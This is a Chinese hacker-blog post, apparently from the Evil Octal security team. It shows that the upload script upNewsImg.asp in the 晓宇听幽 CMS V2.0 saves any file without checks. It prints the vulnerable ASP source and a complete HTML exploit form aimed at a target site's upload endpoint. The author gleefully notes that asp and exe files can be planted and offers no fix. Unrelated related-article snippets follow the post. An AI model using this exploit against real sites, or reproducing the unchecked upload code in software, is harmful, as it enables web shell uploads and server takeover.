晓宇听幽网站内容管理系统 V2.0

(作者给我们留下后门?)

晓宇听幽网站内容管理系统:

目前最强大整站系统:包含一般网站所必须的模块如新闻文章、下载、影视、图片、音乐等各模块相互独立又紧密联系,无限分级,自由调用,支持模板,前台全部生成html,最大程度节省系统资源,大中型门户网站的最佳选择

内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大.

但是转到upload目录,发现两个文件

uploadset.asp upNewsIMg.asp

其中uploadset.asp中做了验证,而upNewsImg.asp中没有任何限制,我们来看一下源代码:

CODE:

<link rel="stylesheet" type="text/css" href="../admin/admin.css">

<script language="JavaScript">

<!-- Hide from older browsers...

//Function to add pic

function Addpic(imagePath){

window.opener.frames.message.focus();

window.opener.frames.message.document.execCommand(’InsertImage’, false, imagePath);

}

// -->

</script>

<% server.scripttimeout=1900 %>

<%

UpFilePath="NewsIMG/"

fileweb="UPLOAD/"

nameset =1

pathset =0

dim i

i=1

%>

<%

function makefilename(fname)

fname = now()

fname = replace(fname,"-","")

fname = replace(fname," ","")

fname = replace(fname,":","")

makefilename=fname

end function

%>

<!--#include FILE="upload_5xsoft.inc"-->

<%

dim upload,file,formName,iCount

dim url,url1

set upload=new upload_5xSoft ’’建立上传对象

iCount=0

for each formName in upload.file ’’列出所有上传了的文件

set file=upload.file(formName) ’’生成一个文件对象

if file.FileSize>0 then       ’’如果 FileSize > 0 说明有文件数据

fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName)

file.SaveAs Server.mappath(UpFilePath&fname)   ’’保存文件

iCount=iCount+1

response.write"图片"&i&" <input type=""text"" name="""&i&""" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(’../"&fileweb&UpFilePath&fname&"’)"">点击这里把图片"&i&"添加到编辑器中</a> ]<br>"

i=i+1

set file=nothing

end if

next

set upload=nothing ’’删除此对象

function GetExtendName(FileName)

dim ExtName

ExtName = LCase(FileName)

ExtName = right(ExtName,3)

ExtName = right(ExtName,3-Instr(ExtName,"."))

GetExtendName = ExtName

end function

%>

[Copy to clipboard]

哈哈,完全可以自己购造一个上传页面,直接上传,连exe文件都可以,别说asp什么的啦.

而且上传完就有地址,简直就是作者给我们留的一个后门.

利用文件:

CODE:

<html>

<head>

<title>文件上传</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

</head>

<body bgcolor="#D6EF7E" text="#000000">

<form name="form1" method="post" action="http://www.target.com/upload/upnewsimg.asp" enctype="multipart/form-data">

<input type="hidden" name="act" value="upload">

<div align="center">

<center>

<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">

<tr>

<th height="16" align="left" valign="middle">

<div align="center">

<b>图片上传</b>

</div>

</th>

</tr>

<tr align="left" valign="middle" bgcolor="#eeeeee">

<td bgcolor="#FFFFFF" height="1" valign="top">

<input type="file" name="file1" style="width:200" class="tx1">

</td>

</tr>

<tr align="center" valign="middle">

<td align="left" id="upid" height="5" bgcolor="#FFFFFF">

</td>

</tr>

<tr align="center" valign="middle" bgcolor="#eeeeee">

<td bgcolor="#FFFFFF" height="28">

<input type="submit" name="Submit" value="· 提交 ·" class="bt">

<input type="reset" name="Submit2" value="· 重执 ·" class="bt"></td>

</tr>

<tr align="center" valign="middle" bgcolor="#eeeeee">

<td height="14" bgcolor="#FFFFFF"> </td>

</tr>

</table>

</center>

</div>

</form>

</body>

</html>

[Copy to clipboard]

百发百中,哈哈.好玩.

我的Blog     http://hhuai.cn

文章:坏坏

来源:邪恶八进制信息安全团队

(0)

相关推荐

  • 晓宇听幽网站内容管理系统 V2.0

    (作者给我们留下后门?) 晓宇听幽网站内容管理系统: 目前最强大整站系统:包含一般网站所必须的模块如新闻文章.下载.影视.图片.音乐等各模块相互独立又紧密联系,无限分级,自由调用,支持模板,前台全部生成html,最大程度节省系统资源,大中型门户网站的最佳选择 内容页面是生成html,比较安全,后台地方看了一下,好像也问题不大. 但是转到upload目录,发现两个文件 uploadset.asp upNewsIMg.asp 其中uploadset.asp中做了验证,而upNewsImg.asp中没

  • python3学生名片管理v2.0版

    python学生名片管理vv2.0是在1.0的基础上增加部分功能,实现将数据存入文件保存,以便于程序停止后还能再次取到数据.具体实现请看如下部分: card_main.py import sys from One.card_func2 import * def head(): print('*' * 30) print('学生信息管理系统v2.0') print('1.添加学生\t2.显示所有\t3.查询学生\t0.退出系统') print('*' * 30) def main(): while

  • 30 个很棒的PHP开源CMS内容管理系统小结

    1. AdaptCMS AdaptCMS Lite 是一个开源的CMS系统,主要特点是易用,而且可以轻松和其他系统接驳,提供简单的扩展定制途径,一个简单而且功能强大的模板系统,以及更多很有用的功能. 2. OneCMS OneCMS是一个适合管理游戏的内容管理系统.它可以很容易的通过自己的一些功能诸如额外的论坛软件,定制区域,定制分类等等来管理站点内的内容.游戏. 3. Pluck Pluck 是一个小型而且简单的内容管理系统,使用 PHP 开发.有了 Pluck 你可以轻松的管理自己的网站,无

  • 内容管理系统(CMS)的设计和选型

    版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明http://www.chedong.com/tech/cms.html 关键词:"content manage system" cms 内容管理系统 内容摘要: 内容管理系统概述 内容管理系统的选型 广告管理系统的选型 论坛/社区系统的选型 所见即所得编辑器的选型 图片上传和文件管理组件 内容管理系统概述内容管理系统是一个很泛的概念:从商业门户网站的新闻系统到个人的Weblog都可以称作发布系统. 框架

  • PHP实现的抓取小说网站内容功能示例

    本文实例讲述了PHP实现的抓取小说网站内容功能.分享给大家供大家参考,具体如下: 爬取免费内容,弄到手机,听书,妥妥的. ini_set('user_agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; GreenBrowser)'); ini_set('max_execution_time', '0'); $base = 'https://www

  • jQuery实现B2B网站后台管理系统侧导航

    效果图 1.html部分 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>index</title> <link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.6.0/css/font-awe

  • 防止网站内容被小偷采集的js代码 原创

    防止网站内容被小偷采集的ASP代码看了一下asp的,因为我的站是静态的所以就凑手写了个静态的javascript版的.具体就不详细说明了:欢迎讨论,原创转载请说明 复制代码 代码如下: <script language="JavaScript"> function setCookie(name, value, expires, path, domain, secure) {         var curCookie = name + "=" + esc

  • 备份网站内容的shell脚本代码

    备份网站内容 复制代码 代码如下: #!/bin/bash#指定运行的脚本shell#运行脚本要给用户执行权限bakdir=/backupmonth=`date +%m`day=`date +%d`year=`date +%Y`hour=`date +%k`min=`date +%M`dirname=$year-$month-$day-$hour-$minmkdir $bakdir/$dirnamemkdir $bakdir/$dirname/confmkdir $bakdir/$dirname

  • 更新网站内容的几点经验

    网站内容是一个网站的生命力源泉,如果站长不懂得如何及时有效地去更新自己网站,我想这样的网站只能永远跟在别人后面,是做不大的.以前我也是经常去各个同类网站,只会见好的文章就抄来,还美其名曰:网海拾贝.以为这样我的网站就会大受欢迎,其实不然.事实上很长一段时间内,我的网站PW(Page Views )一直都很低,不到IP量的2.5倍.那要怎么样更新网站能够吸引浏览者访问更多页面并且留下来,下面结合我这一年多的经验讨论几点方法,一家之言,请勿见笑: 1,合理利用搜索引擎 百度我是比较喜欢的.百度搜索的

  • 基于Vue 2.0 监听文本框内容变化及ref的使用说明介绍

    如下所示: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> <link rel="stylesheet" href="css/bootstrap.css" rel="external nofollow" >

随机推荐